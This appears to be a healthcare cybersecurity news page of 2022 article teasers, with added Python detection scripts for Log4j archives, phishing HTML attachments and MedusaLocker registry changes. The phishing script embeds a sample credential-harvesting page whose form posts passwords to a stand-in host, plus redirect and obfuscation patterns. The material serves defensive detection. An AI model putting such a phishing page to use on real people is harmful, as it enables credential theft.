Healthcare cybersecurity is a growing concern. The last few years have seen hacking and IT security incidents steadily rise and many healthcare organizations have struggled to defend their network perimeter and keep cybercriminals at bay.

2015 was a record year for healthcare industry data breaches. More patient and health plan member records were exposed or stolen in 2015 than in the previous 6 years combined, and by some distance. More than 113 million records were compromised in 2015 alone, 78.8 million of which were stolen in a single cyberattack. 2016 saw more healthcare data breaches reported than any other year, and 2017 looks set to be another record breaker.

Healthcare providers now have to secure more connected medical devices than ever before and there has been a proliferation of IoT devices in the healthcare industry. The attack surface is growing and cybercriminals are developing more sophisticated tools and techniques to attack healthcare organizations, gain access to data and hold data and networks to ransom.

The healthcare industry has been slow to respond and has lagged behind other industries when it comes to cybersecurity. However, cybersecurity budgets have increased, new technology has been purchased, and healthcare organizations are getting better at blocking attacks and keeping their networks secure.

The articles in this healthcare cybersecurity section are intended to help HIPAA covered entities decide on the best technologies to protect their networks from attack and develop effective policies, procedures and security awareness training programs to prevent costly data breaches.

Our healthcare cybersecurity section contains articles and new reports relating to:

New vulnerabilities that could be exploited to gain access to healthcare networks

Security warnings about new attack vectors currently being used by cybercriminals to gain access to healthcare networks and data

Details of new malware and ransomware that threaten the confidentiality, integrity, and availability of protected health information

Healthcare cybersecurity best practices

New guidelines for HIPAA covered entities on data and device security

Updates from the Healthcare Industry Cybersecurity Task Force

Details of cybersecurity frameworks that can be adopted by healthcare organizations to improve security posture

Advice related to the HIPAA Security Rule and the safeguards that must be applied to secure medical devices, networks and healthcare data

The latest healthcare cybersecurity surveys, reports and white papers

Ransomware Gangs Adopt Callback Phishing Techniques for Gaining Initial Network Access
Aug 15

Multiple ransomware groups have adopted the BazarCall callback phishing technique to gain initial access to victims’ networks, including threat actors that have targeted the healthcare sector. BazarCall is a type of callback phishing, where targeted organizations are sent ‘phishing’ emails that request a call to a telephone number to resolve an important issue. As with standard phishing campaigns, there is urgency: if no action is taken, there will be bad consequences. The telephone number provided is manned by the threat actor, who is well versed in social engineering techniques and will attempt to trick the caller into taking actions that give the threat actor access to the victim’s network. That action could be to visit a malicious website or download a malicious file. In the BazarCall campaign, the targeted individual is told in the email that a subscription or free trial is coming to an end and will auto-renew at a cost. In order to cancel the subscription, the user must call the number provided. If the call is made, the threat actor will attempt to get the user...

Healthcare Providers Targeted in Evernote Phishing Campaign
Aug 12

A malicious phishing campaign has been identified that is targeting healthcare providers. The emails use an Evernote-themed lure to trick recipients into downloading a Trojan file that generates a login prompt to steal credentials. The Health Sector Cybersecurity Coordination Center (HC3) has recently issued an alert about the campaign, which has targeted several healthcare providers in the United States. Malicious emails are sent to targeted organizations that contain a link to an Evernote-themed website. The emails are personalized and the lures may vary; however, the emails seen by HC3 have the subject line “[Organization Name] [Date] Business Review” and a Secure Message theme. The link in the email directs the user to the Evernote site, where they are prompted to download an HTML file called message (3).html. The file includes JavaScript code that renders an Adobe- or Microsoft-themed page that attempts to harvest Outlook, IONOS, AOL, or other credentials. The credentials obtained in phishing campaigns such as this can...

CISA Sounds Alarm About Zeppelin Ransomware Targeting Healthcare Organizations
Aug 11

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) have issued a joint security alert about the Zeppelin ransomware-as-a-service (RaaS) operation, which has extensively targeted organizations in the healthcare and medical industries. Zeppelin ransomware, a variant of Vega malware, has been used in attacks on critical infrastructure organizations since 2019. The threat actors have been observed using a variety of vectors to gain initial access to victims’ networks, especially the exploitation of Remote Desktop Protocol (RDP), vulnerabilities in SonicWall appliances, vulnerabilities in Internet-facing applications, and phishing emails. The phishing-based attacks use a combination of malicious links and attachments containing malicious macros. The threat actors typically spend around 1-2 weeks inside victims’ networks before deploying the ransomware payload. During this time, they map or enumerate victims’ networks, identify data of interest, including backups and cloud storage services, and exfiltrate sensitive data. A...

1H 2022 Healthcare Data Breach Report
Aug 11

Ransomware attacks are rife, hacking incidents are being reported at high levels, and several very large healthcare data breaches have been reported so far in 2022; however, our analysis of healthcare data breaches reported in 1H 2022 shows that, while breaches are still being reported in high numbers, fewer were reported than in 1H 2021. Between January 1, 2022, and June 30, 2022, 347 healthcare data breaches of 500 or more records were reported to the Department of Health and Human Services’ Office for Civil Rights (OCR), the same number as in 2H 2021. In 1H 2021, 368 healthcare data breaches were reported to OCR, 21 more than in the corresponding period this year, which represents a 5.71% reduction in reported breaches. The number of healthcare records breached has also continued to fall: 27.6 million records were breached in 1H 2021, 22.2 million in 2H 2021, and 20.2 million in 1H 2022. That is a...

HC3 Warns About Risks of IoT in Healthcare
Aug 09

The Health Sector Cybersecurity Coordination Center (HC3) has published a security advisory warning the healthcare and public health sector about the risks associated with Internet of Things (IoT) devices and has made recommendations for improving the security of IoT devices. The Internet of Things (IoT) refers to physical devices that have the capability to exchange data or connect to other devices over the Internet. Currently, there are around 7 billion devices that are connected through IoT, and IoT device use is expected to increase to 20 billion devices worldwide by 2025. These devices use sensors to collect data and communicate over the Internet and include a wide range of “smart” appliances such as TVs and washing machines, doorbell cameras, Amazon Echo devices, voice controllers, and wearable devices. IoT devices are used in industrial settings and many medical devices use IoT. While there have been major advances in IoT technology in recent years to make the technology cheaper and more accessible, the main architectural layers have largely remained unchanged and there is...

Most Common Malware Strains in 2021
Aug 05

The U.S. Cybersecurity and Infrastructure Security Agency has published a list of the top malware strains identified in 2021. Malware is used by threat actors to compromise devices, giving them a backdoor into devices and networks for performing a range of nefarious activities. Malware can also be destructive and be used to sabotage systems, such as wipers that delete all data in systems. The rise in the value of cryptocurrencies has seen an increase in the use of cryptocurrency miners, which hijack the resources of systems for mining cryptocurrencies. Malware such as worms are able to not just compromise one device, but also self-propagate and infect all other vulnerable devices on a network. In recent years there has been a major increase in the use of ransomware. Ransomware encrypts files on targeted systems to prevent data access, and a ransom demand is issued for the keys to unlock the encryption. Most ransomware variants also support data exfiltration, and files are stolen prior to encryption. The ransom must then be paid not just to decrypt files, but also to prevent the...

55% of Healthcare Organizations Suffered a Third-Party Data Breach in the Past Year
Aug 03

Cyberattacks on businesses have been increasing year over year across all industry sectors, and there has been an increase in cyberattacks involving third parties. From the point of view of a cyber threat actor, it makes more sense to attack a vendor such as a managed service provider, as if the attack is successful, the threat actor will be able to gain access to the networks of the company’s clients. Already in 2022, there have been several major cyberattacks on vendors used by healthcare organizations, one of which impacted 650 of the company’s HIPAA-covered entity clients. SecureLink, a provider of access management solutions for businesses, has recently explored how businesses are managing the risk associated with providing vendors with privileged access to their systems and has identified areas where the risks are not being effectively managed, even though efforts are being made to improve cybersecurity. For SecureLink’s latest report, The State of Cybersecurity and Third-Party Remote Access Risk, the company surveyed 600 U.S. companies across a range of industry sectors,...

Ransom Payment Data Suggests More Victims are Choosing Not to Pay
Aug 02

The average payment to ransomware gangs increased in Q2, 2022; however, there was a fall in the median payment for the second successive quarter, indicating more victims of ransomware attacks are choosing not to pay up. The data comes from the latest quarterly report from the ransomware remediation firm, Coveware. The average ransom payment in Q2, 2022 was $228,125, which is an 8% increase from the previous quarter. The median ransom payment was $36,360, which is a 51% decrease from Q1, 2022. According to Coveware, the recent fall in payments indicates the changing profile of attacked companies, with ransomware gangs now tending to focus on attacking mid-market companies. Attacks on large enterprises are costly due to their large budgets for cybersecurity but the potential returns are greater. While ransomware attacks on mid-market firms mean the ransom demands must be smaller, the risks associated with attacks are also lower. Mid-market firms appear to be the sweet spot. The profits are sufficiently high to make the attacks worthwhile, and the ransomware gangs are less likely to...

Ransomware Attacks Drop by 23% Globally but Increase by 328% in Healthcare
Jul 29

SonicWall has released a mid-year update to its 2022 Cyber Threat Report, which highlights the global cyberattack trends in H1 2022. The data for the report was collected from more than 1.1 million global sensors in 215 countries and shows a global fall in ransomware attacks, with notable increases in malware attacks for the first time in 3 years.

Ransomware

SonicWall reports a 23% fall in ransomware attacks globally in H1 2022, which fell to 236.1 million attempted attacks, continuing the downward trend that has been observed for the previous four quarters. June 2022 saw the lowest number of ransomware hits in the past 23 months. While ransomware attacks are down overall, that is not the case for the healthcare industry, which saw a 328% increase in attacks in H1 2022. While the reduction in attacks is certainly good news, it should be noted that the year-to-date figures for ransomware attacks are still higher than they were in all of 2017, 2018, and 2019. In the United States, SonicWall recorded an average of 707 ransomware attempts per customer in the first half of 2022....

IBM: Average Cost of a Healthcare Data Breach Reaches Record High of $10.1 Million
Jul 28

The average cost of a healthcare data breach has reached double digits for the first time ever, according to the 2022 Cost of a Data Breach Report from IBM. The average cost of a healthcare data breach jumped almost $1 million to a record high of $10.1 million, which is 9.4% more than in 2021 and 41.6% more than in 2020. Across all industry sectors, the average cost of a data breach was up 2.6% year over year at $4.35 million, which is the highest average cost in the 17 years that IBM has been producing its annual cost of a data breach reports and 12.7% higher than in 2020. The report is based on a study of 550 organizations in 17 countries and regions and 17 different industry sectors that suffered data breaches between March 2021 and March 2022. For the report, IBM Security conducted more than 3,600 interviews with individuals in those organizations. 83% of organizations represented in the report have experienced more than one data breach, and 60% of organizations said the data breach resulted in them having to increase the price of their products and services. Summary of 2022...

Cloud Security Alliance Releases Third Party Vendor Risk Management Guidance for Healthcare Organizations
Jul 27

Cyber actors are increasingly targeting business associates of HIPAA-covered entities as they provide an easy way to gain access to the networks of multiple healthcare organizations. To help healthcare delivery organizations (HDOs) deal with the threat, the Cloud Security Alliance (CSA) has published new guidance on third-party vendor risk management in healthcare. The guidance was drafted by the Health Information Management Working Group and includes examples and use cases and provides information on some of the risk management program tools that can be used by HDOs for risk management. Third-party vendors provide invaluable services to HDOs, including services that cannot be effectively managed in-house; however, the use of vendors introduces cybersecurity, reputational, compliance, privacy, operational, strategic, and financial risks that need to be managed and mitigated. The guidance is intended to help HDOs identify, assess, and mitigate the risks associated with the use of third-party vendors to prevent and limit the severity of security incidents and data breaches....

HC3 Warns of Risk of Web Application Attacks on Healthcare Organizations
Jul 25

The Department of Health and Human Services’ Health Sector Cybersecurity Coordination Center (HC3) has issued guidance to help healthcare organizations protect against web application attacks. Web applications have grown in popularity in healthcare in recent years and are used for patient portals, electronic medical record systems, scheduling appointments, accessing test results, patient monitoring, online pharmacies, dental CAD systems, inventory management, and more. These applications are accessed through a standard web browser; however, in contrast to most websites, the user is required to authenticate to the application. Web application attacks are conducted by financially motivated cybercriminals and state-sponsored Advanced Persistent Threat (APT) actors for a range of different nefarious activities. Attacks exploiting vulnerabilities in web applications have been increasing, and web application attacks are now the number one healthcare attack vector, according to the 2022 Verizon Data Breach Investigations Report. Web application attacks most commonly target internet-facing...

Department of Justice Announces Seizure of $500,000 in Ransom Payments Made by U.S. Healthcare Providers
Jul 21

The U.S Department of Justice has announced that around $500,000 in Bitcoin has been seized from North Korean threat actors who were using Maui ransomware to attack healthcare organizations in the United States. The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) recently issued a security alert warning that North Korean hackers have been targeting the healthcare and public health sector in the United States using Maui ransomware since at least May 2021. The attacks have caused extensive disruption to IT systems and medical services and have put patient safety at risk. The new ransomware variant was discovered during an investigation of a ransomware attack on a hospital in Kansas in May 2021. The attack was traced to a North Korean hacking group that is suspected of receiving backing from the state. The Kansas hospital had its servers encrypted, preventing access to essential IT systems for more than a week. The hospital paid a ransom of $100,000 for the keys to decrypt files and regain access to its servers and promptly...

Study Confirms Security Awareness Training Significantly Reduces Susceptibility to Phishing Attacks
Jul 19

A recent Phishing by Industry Benchmarking Report has confirmed that providing security awareness training to the workforce significantly reduces susceptibility to phishing attacks. The benchmarking study was conducted by KnowBe4 to determine how effective security awareness training is at reducing susceptibility to phishing attacks. For the report, KnowBe4 analyzed data from more than 9.5 million users across 19 industry sectors, over 30,000 organizations, and 23.4 million simulated phishing emails. The study covered 22,558 small organizations with 1-249 employees, 5,876 mid-sized organizations with between 250 and 999 employees, and 1,709 large organizations with 1,000 or more employees. According to the 2022 Verizon Data Breach Investigations Report (DBIR), 82% of data breaches in 2021 involved a human element, confirming that people play a major role in security incidents and data breaches. Cybercriminals continue to target the human element as it provides an easy way of gaining access to business networks, and one of the main ways that employees are targeted is...

Cyber Safety Review Board Says Log4j Vulnerabilities Endemic and Will Persist for Years
Jul 18

The Cyber Safety Review Board (CSRB), established by President Biden in February 2022, has published a report on the Log4j vulnerability – CVE-2021-44228 – and associated vulnerabilities that were discovered in late 2021. The vulnerabilities affect the open source Java logging library Log4j and, according to the CSRB, are endemic and likely to be present in many systems for years to come. The Log4j vulnerability can be exploited remotely to achieve code execution on vulnerable systems and was assigned the maximum CVSS severity score of 10 out of 10. According to the report, the vulnerabilities are among the most serious to be discovered in recent years. The CSRB includes 15 cybersecurity leaders from the private sector and government and has been tasked with conducting reviews of major cybersecurity events and making recommendations for improving public and private sector cybersecurity. The Log4j vulnerability report is the first to be published by the CSRB since its formation. “At this critical juncture in our nation’s cybersecurity, when our ability to handle risk is not...
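Because the CSRB expects vulnerable Log4j copies to linger inside application bundles for years, the practical check is an archive scanner rather than a package-manager query. The example below is added here as an illustration and is not CSRB, Apache Log4j, or HIPAA Journal code: it walks a WAR and every JAR nested inside it, in memory, looking for the JndiLookup.class that implements the JNDI lookup behind CVE-2021-44228. The sample archives are constructed in memory, and the class bytes are a placeholder rather than a real class file. A hit flags the archive for version triage; later 2.x releases still ship the class with JNDI disabled, so presence alone does not prove exploitability.

```python
"""Scan JAR/WAR/EAR archives, including archives nested inside them, for the
Log4j 2 class that implements the JNDI lookup behind CVE-2021-44228.
Added illustration, not CSRB or Apache Log4j code. The archives below are
constructed in memory; a real run would read files from disk."""
import io
import zipfile

# Class path named in Apache's removal mitigation for Log4j 2.10-2.14
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")


def find_jndi_lookup(data, label="<root>", depth=0, max_depth=5):
    """Return 'outer!inner!...!JndiLookup.class' paths for every copy found.
    Nested archives are read from memory so shaded and fat JARs are covered;
    max_depth bounds recursion on pathological nesting."""
    hits = []
    if depth > max_depth:
        return hits
    try:
        archive = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return hits            # not a zip container: nothing to inspect
    with archive:
        for entry in archive.infolist():
            name = entry.filename
            if name == JNDI_LOOKUP:
                hits.append(f"{label}!{name}")
            elif name.lower().endswith(ARCHIVE_SUFFIXES):
                hits.extend(find_jndi_lookup(archive.read(entry),
                                             f"{label}!{name}", depth + 1, max_depth))
    return hits


def build_zip(entries):
    """Build an in-memory zip from {name: bytes} (test-data helper)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as archive:
        for name, payload in entries.items():
            archive.writestr(name, payload)
    return buf.getvalue()


# Constructed samples. The class bytes are a placeholder, not a real class file.
VULNERABLE_CORE = build_zip({
    "META-INF/MANIFEST.MF": b"Manifest-Version: 1.0\n",
    JNDI_LOOKUP: b"\xca\xfe\xba\xbe placeholder",
})
SAMPLE_WAR = build_zip({
    "WEB-INF/lib/log4j-core-2.14.1.jar": VULNERABLE_CORE,
    "WEB-INF/lib/log4j-api-2.14.1.jar": build_zip({"META-INF/MANIFEST.MF": b"Manifest-Version: 1.0\n"}),
})
# A core jar from which the class has been deleted (the documented zip -d mitigation)
STRIPPED_WAR = build_zip({
    "WEB-INF/lib/log4j-core-2.14.1.jar": build_zip({"META-INF/MANIFEST.MF": b"Manifest-Version: 1.0\n"}),
})

if __name__ == "__main__":
    for label, blob in (("app.war", SAMPLE_WAR), ("stripped.war", STRIPPED_WAR)):
        print(label, find_jndi_lookup(blob, label) or "no JndiLookup.class")
```

To scan real files, read each archive from disk and pass the bytes with the file path as the label; the returned strings then tell you exactly which nested jar to upgrade or, as a stop-gap on 2.10-2.14 builds, which jar to strip with zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class.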

Oklahoma State University Settles HIPAA Case with OCR for $875,000
Jul 15

The Department of Health and Human Services’ (HHS) Office for Civil Rights (OCR) has announced that Oklahoma State University – Center for Health Sciences (OSU-CHS) has agreed to settle a HIPAA investigation stemming from a web server hacking incident and has agreed to pay a financial penalty of $875,000 to resolve potential violations of the HIPAA Privacy, Security, and Breach Notification Rules. OSU-CHS is a public land-grant research university that provides preventive, rehabilitative, and diagnostic care in Oklahoma. OCR launched a HIPAA investigation after receiving a breach report on January 5, 2018, in response to the hacking of an OSU-CHS web server. OSU-CHS determined that malware had been installed on the server which allowed the hacker(s) to access the electronic protected health information of 279,865 individuals. The information exposed and potentially obtained by an unauthorized third party included names, Medicaid numbers, healthcare provider names, dates of service, dates of birth, addresses, and treatment information. OSU-CHS initially declared that the data breach...

Over 10,000 Organizations Targeted in Ongoing MFA-Bypassing Phishing and BEC Campaign
Jul 13

Microsoft has warned of a large-scale phishing campaign targeting Office 365 credentials that bypasses multi-factor authentication (MFA). The campaign is ongoing and more than 10,000 organizations have been targeted by scammers in the past 10 months. Microsoft reports that one of the phishing runs used emails with HTML file attachments, with the email telling the user about a Microsoft voicemail message that had been received. The HTML file had to be opened to download the message. The HTML file serves as a gatekeeper, ensuring the targeted user was arriving at the URL from a redirect from the original attachment. The user is redirected to a website that hosts a popular open source phishing kit, which is used to harvest credentials. The user is told that they need to sign in to their Microsoft account to receive the voicemail message and after sign in an email will be sent to the user’s mailbox within an hour with the MP3 voicemail message attached. The user’s email address is auto-filled into the login window and the user only needs to enter their password. This campaign is...
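The Evernote-themed campaign above and this voicemail-themed one both deliver an HTML file rather than a link: one renders a credential prompt from JavaScript, the other acts as a gatekeeper that redirects on to the phishing site with the recipient's address carried along so the login page can pre-fill it. The triage script below is an added illustration, not HC3's or Microsoft's detection logic, and is meant for a mail gateway or sandbox hook that already has the attachment body in hand. It scores an HTML attachment on the traits the two campaigns share: a password field, a form posting to an external host, a client-side redirect, page content produced at runtime (document.write, innerHTML, atob), and the recipient's address embedded in the file. Both sample attachments, the recipient address, the phish.example host, and the three-finding alert threshold are constructed assumptions.

```python
"""Triage an HTML e-mail attachment for the traits shared by the Evernote-themed
campaign (a script-rendered credential prompt) and the voicemail-themed one (an
attachment that redirects on to the phishing site with the recipient pre-filled).
Added illustration, not HC3's or Microsoft's detection logic; the sample
attachments, recipient, host and threshold below are constructed."""
import re
from html.parser import HTMLParser


class AttachmentScanner(HTMLParser):
    """Collect the few facts the heuristics need from the markup."""
    def __init__(self):
        super().__init__()
        self.password_inputs = 0
        self.form_actions = []
        self.scripts = []
        self.meta_refresh = False
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_inputs += 1
        elif tag == "form":
            self.form_actions.append(a.get("action") or "")
        elif tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            self.meta_refresh = True
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)


# location assignment / replace() / assign(), with or without window./top./self.
REDIRECT_RE = re.compile(r"(?:window\.|top\.|self\.)?location(?:\.href|\.replace|\.assign)?\s*[=(]")
# page body produced at runtime or unpacked from base64
RENDER_RE = re.compile(r"document\.write\s*\(|\.innerHTML\s*=|\batob\s*\(")


def score_attachment(html, recipient):
    """Return the list of heuristic findings for one attachment."""
    p = AttachmentScanner()
    p.feed(html)
    p.close()
    script = "\n".join(p.scripts)
    findings = []
    if p.password_inputs:
        findings.append("password-field")
    if any(a.startswith(("http://", "https://")) for a in p.form_actions):
        findings.append("form-posts-offsite")
    if p.meta_refresh or REDIRECT_RE.search(script):
        findings.append("client-side-redirect")
    if RENDER_RE.search(script):
        findings.append("script-rendered-page")
    if recipient.lower() in html.lower():
        findings.append("recipient-prefilled")
    return findings


def is_suspicious(html, recipient, threshold=3):
    """Three or more traits together is the alert threshold chosen here (an assumption)."""
    return len(score_attachment(html, recipient)) >= threshold


RECIPIENT = "victim@example-hospital.org"        # constructed

# Constructed stand-in for 'message (3).html'; the base64 decodes to "<h1>Sign in</h1>"
PHISH_ATTACHMENT = """<html><head><title>Secure Message</title></head><body>
<script>
var u = "victim@example-hospital.org";
document.write(atob("PGgxPlNpZ24gaW48L2gxPg=="));
if (!location.hash) { location.replace("https://phish.example/voicemail#" + u); }
</script>
<form method="post" action="https://phish.example/collect.php">
  <input type="email" name="user" value="victim@example-hospital.org">
  <input type="password" name="pass">
</form></body></html>"""

# Constructed: an ordinary personalised notice with no form or script
BENIGN_ATTACHMENT = """<html><body><p>Hello victim@example-hospital.org,
your appointment on 28 June is confirmed.</p></body></html>"""

if __name__ == "__main__":
    for label, doc in (("message (3).html", PHISH_ATTACHMENT), ("notice.html", BENIGN_ATTACHMENT)):
        print(label, score_attachment(doc, RECIPIENT), is_suspicious(doc, RECIPIENT))
```

A personalised but legitimate attachment trips only the recipient check, which is why the decision is made on the combination rather than on any single trait; tune the threshold against your own mail flow before blocking on it.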

Feds Warn of Threat of Maui Ransomware Attacks By North Korean State-Sponsored Hackers
Jul 07

A joint security alert has been issued to the healthcare and public health sector by the Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Department of the Treasury warning about the threat of Maui ransomware attacks. Since May 2021, North Korean state-sponsored cyber actors have been targeting organizations in the U.S. healthcare and public health sector and have been encrypting servers that support electronic medical record systems and diagnostic, imaging, and intranet services. These attacks have resulted in data encryption which has disrupted the services provided to patients and, in some cases, has resulted in disruption to services for long periods. According to the advisory, initial access is gained to healthcare networks and the ransomware is deployed manually. The threat actors use a command-line interface to control the ransomware payload and launch attacks. Healthcare organizations are an attractive target for ransomware threat actors as they are heavily reliant on data for providing their services. Attacks can cause...

FBI, CISA, & FinCEN Sound Alarm About MedusaLocker Ransomware
Jul 06

The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), Department of the Treasury, and the Financial Crimes Enforcement Network (FinCEN) have issued a joint cybersecurity advisory about MedusaLocker ransomware. The MedusaLocker threat group appears to operate as a ransomware-as-a-service operation, where affiliates are recruited to conduct the attacks for between 55 and 60% of any ransom payments they generate. MedusaLocker was first detected in September 2019 and has been used to attack a broad range of targets in the United States. Once access to victims’ networks has been gained, a batch file is used to execute a PowerShell script which propagates MedusaLocker throughout the network. This is achieved by editing the EnableLinkedConnections value within the infected machine’s registry, which then allows the infected machine to detect attached hosts and networks via Internet Control Message Protocol (ICMP) and detect shared storage via Server Message Block (SMB) Protocol. MedusaLocker will terminate security, accounting, and forensic...
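The registry edit the advisory describes is a usable detection point: EnableLinkedConnections under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System is rarely set outside of a deliberate administrative policy, and setting it from a PowerShell or batch host is rarer still. The script below is an added illustration, not CISA's or any vendor's detection content. It runs over Sysmon Event ID 13 (RegistryEvent SetValue) records that have been flattened to one key=value line each; that flattened format, the hostnames and the image paths are constructed, and the severity scheme (high when a scripting host wrote the value, medium otherwise) is an assumption to adapt to your environment.

```python
"""Detect a SetValue on EnableLinkedConnections, the registry change the CISA
advisory attributes to MedusaLocker's propagation script. Added illustration,
not CISA's or any vendor's detection content. The Sysmon Event ID 13 records
below are constructed and flattened to one 'Key=Value|Key=Value' line each."""
import re

TARGET_SUFFIX = r"\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections"
# Interpreters a batch-file-launched PowerShell propagation script would show up as
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe")


def parse_record(line):
    """Parse the constructed 'Key=Value|Key=Value' line into a dict."""
    return dict(field.split("=", 1) for field in line.strip().split("|") if "=" in field)


def is_enablelinkedconnections_set(rec):
    """True for a SetValue on EnableLinkedConnections whose new data is non-zero."""
    if rec.get("EventID") != "13" or rec.get("EventType") != "SetValue":
        return False
    if not rec.get("TargetObject", "").lower().endswith(TARGET_SUFFIX.lower()):
        return False
    m = re.search(r"DWORD\s*\((0x[0-9a-fA-F]+)\)", rec.get("Details", ""))
    return bool(m) and int(m.group(1), 16) != 0


def triage(lines):
    """Return (host, image, severity) for each matching record. Severity is
    'high' when a scripting host made the change, 'medium' otherwise (e.g. a
    policy tool applying an intended setting)."""
    alerts = []
    for line in lines:
        rec = parse_record(line)
        if not is_enablelinkedconnections_set(rec):
            continue
        image = rec.get("Image", "").lower()
        severity = "high" if image.endswith(SCRIPT_HOSTS) else "medium"
        alerts.append((rec.get("Computer", "?"), rec.get("Image", "?"), severity))
    return alerts


# Constructed sample events: one matching write from PowerShell, one unrelated
# value under the same key, and one that sets the value back to 0.
SAMPLE_EVENTS = [
    "EventID=13|EventType=SetValue|Computer=WS-042|"
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|"
    "TargetObject=HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLinkedConnections|"
    "Details=DWORD (0x00000001)",
    "EventID=13|EventType=SetValue|Computer=WS-042|Image=C:\\Windows\\System32\\svchost.exe|"
    "TargetObject=HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA|"
    "Details=DWORD (0x00000001)",
    "EventID=13|EventType=SetValue|Computer=SRV-01|Image=C:\\Windows\\System32\\gpupdate.exe|"
    "TargetObject=HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLinkedConnections|"
    "Details=DWORD (0x00000000)",
]

if __name__ == "__main__":
    for host, image, severity in triage(SAMPLE_EVENTS):
        print(f"[{severity}] {host}: EnableLinkedConnections set by {image}")
```

The value itself makes drive mappings created under a user's standard token visible to processes running with the elevated token, which is what lets the propagation script reach shares the user can see; if your baseline legitimately sets it by policy, key the rule on the writing process rather than suppressing the event.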

Warning Issued About 3 High-Severity Vulnerabilities in OFFIS DICOM Software
Jun 28

The Cybersecurity and Infrastructure Security Agency (CISA) has issued a security advisory for the healthcare and public health sector warning about three high-severity vulnerabilities in OFFIS DCMTK software. The software is used for examining, constructing, and converting DICOM image files, handling offline media, and sending and receiving images over a network connection. The vulnerabilities affect all versions of DCMTK prior to version 3.6.7. If exploited, a remote attacker could trigger a denial-of-service condition, write malformed DICOM files into arbitrary directories, and gain remote code execution. Two path traversal vulnerabilities have been identified in the product which could be exploited to write malformed files into arbitrary directories under controlled names, allowing remote code execution. The product’s service class provider (SCP) is vulnerable to path traversal – CVE-2022-2119 – and the service class user (SCU) is vulnerable to relative path traversal – CVE-2022-2120. Both vulnerabilities have been assigned a CVSS v3 base score of 7.5 out of 10 (high...

Vulnerabilities Identified in Welch Allyn Resting Electrocardiograph Devices
Jun 21

Hillrom Medical Device Management has announced that two vulnerabilities have been identified in certain Welch Allyn medical devices. If exploited, the vulnerabilities could allow an unauthorized attacker to compromise software security by executing commands, gaining privileges, and reading sensitive information while evading detection. The vulnerabilities affect the following Hillrom products:

Welch Allyn ELI 380 Resting Electrocardiograph (versions 2.6.0 and prior)

Welch Allyn ELI 280/BUR280/MLBUR 280 Resting Electrocardiograph (versions 2.3.1 and prior)

Welch Allyn ELI 250c/BUR 250c Resting Electrocardiograph (versions 2.1.2 and prior)

Welch Allyn ELI 150c/BUR 150c/MLBUR 150c Resting Electrocardiograph (versions 2.2.0 and prior)

The two vulnerabilities were discovered by an anonymous researcher who reported them to Hillrom. The most serious vulnerability, tracked as CVE-2022-26389, has a CVSS v3 severity score of 7.7 out of 10 (high severity) and is due to improper access controls for restricting attempts by unauthorized individuals to access resources. The second...

HHS Offers Advice to Help Healthcare Organizations Strengthen Their Cyber Posture
Jun 20

The HHS’ Health Sector Cybersecurity Coordination Center (HC3) has published guidance for healthcare organizations to help them improve their cyber posture. Cyber posture is the term given to the overall strength of an organization’s cybersecurity, its protocols for predicting and preventing cyber threats, and its ability to continue to operate while responding to cyber threats. To comply with the HIPAA Security Rule, organizations are required to implement safeguards to ensure the confidentiality, integrity, and availability of electronic protected health information and to reduce risks to a low and acceptable level. Technical safeguards help to keep ePHI private and confidential and ensure ePHI can be recovered in the event of a destructive cyberattack. A robust cybersecurity program can help to limit the damage caused in the event of an attack, can prevent the theft of sensitive information such as ePHI and intellectual property, limits the potential for misuse of patient data, and helps to improve customer confidence. HC3 details several steps that can be taken to...

Webinar Today: July 20, 2022: Compliance vs. Security: Why you Need Both to be HIPAA Compliant
Jun 20

Healthcare providers, health plans, healthcare clearinghouses, and business associates of those entities that come into contact with protected health information (PHI) are required to ensure policies, processes, and people are compliant with the Rules of the Health Insurance Portability and Accountability Act (HIPAA). Ensuring you have a good security posture is an important part of HIPAA compliance. The HIPAA Security Rule requires HIPAA-regulated entities to have appropriate safeguards in place to ensure the confidentiality, integrity, and availability of ePHI, and to manage risks to protected health information and reduce them to a low and acceptable level. Ensuring you have a good security posture has never been more important. Cyber threat actors have stepped up their attacks on the healthcare industry and data breaches are occurring at record levels. Further, following the ‘Safe Harbor’ update to the HITECH Act, if you are able to demonstrate you have implemented recognized security practices, you will be protected against fines, sanctions, and extensive audits and...

Bipartisan Legislation Introduced to Strengthen Cybersecurity for Medical Devices
Jun 17

A bipartisan bill – The Strengthening Cybersecurity for Medical Devices Act – has been introduced which calls for the U.S. Food and Drug Administration (FDA) to review and update its guidelines on medical device cybersecurity more frequently to ensure devices are protected from potential hacking and cyberattacks. The bill, introduced by Sen. Jacky Rosen (D-NV) and co-sponsored by Sen Todd Young (R-IN), calls for the Secretary of the Department of Health and Human Services (HHS), in consultation with the Director of the Cybersecurity and Infrastructure Security Agency (CISA), to provide updated guidance on medical device cybersecurity to FDA every year, and for the FDA to issue updated guidelines and suggestions on medical device cybersecurity at least every two years. The frequency of updates needs to be improved to ensure the guidelines remain current, especially considering the fast-evolving threat landscape and the extent to which the healthcare industry is being targeted by cyber threat actors. “Medical devices are increasingly connected to the Internet or other...

The HIPAA Password Requirements and the Best Way to Comply With Them
